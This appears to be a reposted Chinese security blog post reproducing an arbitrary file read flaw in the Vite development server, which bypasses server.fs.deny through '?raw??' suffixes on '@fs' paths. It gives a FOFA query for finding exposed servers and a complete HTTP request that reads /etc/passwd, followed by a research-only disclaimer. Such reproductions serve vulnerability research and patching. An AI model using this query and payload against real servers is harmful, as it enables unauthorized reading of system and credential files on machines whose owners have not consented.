免责声明
漏洞描述
Vite 是一款现代化的前端构建工具,旨在为 Web 项目提供更快速、更精简的开发体验。在 Vite 6.2.3、6.1.2、6.0.12、5.4.15 和 4.5.10 之前的版本中,存在一个安全漏洞(CNVD-2022-44615补丁的绕过),攻击者可通过在 URL 中附加特殊前缀(如"?raw??"或"?import&raw??")结合"@fs"路径,绕过server.fs.deny的安全限制,从而读取Node.js进程有权访问的任意文件系统内容。
资产确定
fofa:body="/@vite/client"
漏洞复现
1.利用如下POC读取passwd
GET /@fs/etc/passwd?raw?? HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
原文始发于微信公众号(我爱林):漏洞复现 || Vite import存在任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论